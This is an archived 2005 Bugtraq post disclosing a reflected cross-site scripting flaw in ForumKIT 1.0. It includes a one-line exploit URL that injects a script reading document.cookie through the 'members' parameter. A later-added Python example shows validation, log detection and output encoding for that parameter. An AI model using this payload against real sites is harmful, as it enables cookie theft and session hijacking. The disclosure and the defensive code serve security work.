[38183] in bugtraq


XSS Vulnerability in ForumKIT

daemon@ATHENA.MIT.EDU (tom cruise)
Thu Jan 13 13:08:56 2005

Date: 13 Jan 2005 11:17:00 -0000
Message-ID: <20050113111700.12211.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: tom cruise <the.n3t@gmail.com>
To: bugtraq@securityfocus.com



Vulnerable System :
forumKIT 1.0

Description : 
An XSS was found in the variable members, which has the value 'true'.
You can exchange it with XSS code.

exploit : 
http://forum.target.com/f.aspx?members=">&lt;script&gt;alert(document.cookie);&lt;/script&gt;

This exploit was discovered by: neO
e-mail : al_modamer@hotmail.com
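
Added example, not part of the original post and not forumKIT's own code: a server-side allow-list check, an access-log detection rule, and attribute encoding for the members parameter described above, shown in Python. It assumes members is only meant to carry true or false and that the value is echoed into an HTML attribute (the post does not show the rendering code); the host name, function names and sample URLs are constructed.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Assumption: "members" is a flag that should only ever be true or false.
ALLOWED = {"true", "false"}

# Constructed sample requests (inert markup, hypothetical host).
SAMPLE_OK = "http://forum.example/f.aspx?members=true"
SAMPLE_BAD = "http://forum.example/f.aspx?members=%22%3E%3Ci%3Ex%3C%2Fi%3E"


def members_values(url: str) -> list:
    """All decoded values supplied for the members parameter."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("members", [])


def validated_members(url: str) -> str:
    """Allow-list check: anything but a single true/false becomes 'false'."""
    values = members_values(url)
    if len(values) == 1 and values[0].lower() in ALLOWED:
        return values[0].lower()
    return "false"


def is_suspicious(url: str) -> bool:
    """Detection rule for access logs: repeated or off-list members values."""
    values = members_values(url)
    return len(values) > 1 or any(v.lower() not in ALLOWED for v in values)


def render_unsafe(value: str) -> str:
    # Assumed shape of the flaw: the raw value is concatenated into an attribute.
    return '<input type="hidden" name="members" value="' + value + '">'


def render_safe(value: str) -> str:
    # Encode for the attribute context even after validation (defence in depth).
    return '<input type="hidden" name="members" value="' + html.escape(value, quote=True) + '">'


if __name__ == "__main__":
    for url in (SAMPLE_OK, SAMPLE_BAD):
        raw = members_values(url)[0]
        print(is_suspicious(url), validated_members(url))
        print("  unsafe:", render_unsafe(raw))
        print("  safe:  ", render_safe(raw))
```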
